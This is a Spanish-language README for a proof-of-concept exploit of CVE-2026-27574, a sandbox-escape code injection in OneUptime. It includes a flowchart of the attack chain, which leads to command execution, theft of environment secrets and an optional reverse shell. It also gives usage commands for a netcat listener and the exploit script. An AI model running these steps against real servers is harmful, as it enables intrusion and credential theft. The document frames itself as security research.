
Prueba de concepto de exploit para CVE-2026-27574, una inyección de código crítica en OneUptime que permite la ejecución remota de código y la fuga de variables de entorno.
Exploit de prueba de concepto para CVE-2026-27574 – una vulnerabilidad crítica de inyección de código (CWE-94) en OneUptime < 10.0.0 que permite la ejecución arbitraria de JavaScript en el contexto del probe, lo que conduce a una completa y a la filtración de variables de entorno sensibles.
Corregido en: OneUptime 10.0.0 (migración a isolated-vm)
Tipo de exploit: Remoto
Autenticación: Privilegios bajos (cualquier miembro registrado del proyecto)
Impacto: Compromiso total del servidor, robo de credenciales, toma de control del clúster
flowchart TD
A[Start] --> B[Open Registration]
B --> C[Register New Account]
C --> D[Create New Project]
D --> E[Obtain ProjectMember Role]
E --> F[Create Custom JavaScript Monitor]
F --> G[Inject Malicious vm Escape Payload]
G --> H[Probe Executes Code Every ~60s]
H --> I[Escape vm Context via constructor chain]
I --> J[Access process & child_process]
J --> K[Execute System Commands]
J --> L[Leak Environment Variables]
K --> M[Read /etc/passwd, id, hostname, etc.]
L --> N[Extract ONEUPTIME_SECRET, DB/Redis passwords, etc.]
M --> O[Full RCE Achieved]
N --> O
O --> P[Optional: Reverse Shell / Data Exfiltration]
P --> Q[End - System Compromised]
# Iniciar listener (si se usa reverse shell)
nc -lvnp 4444
# Ejecutar el exploit
python3 exploit.py http://target:3002 --lhost TU_IP --lport 4444
requests (pip install requests)Este código se proporciona únicamente con fines educativos y de pruebas de seguridad autorizadas.
El uso no autorizado contra sistemas que no posees o para los que no tienes permiso explícito de prueba es ilegal y poco ético.
Desarrollado por Mohammed Idrees Banyamer • Jordania • @banyamer_security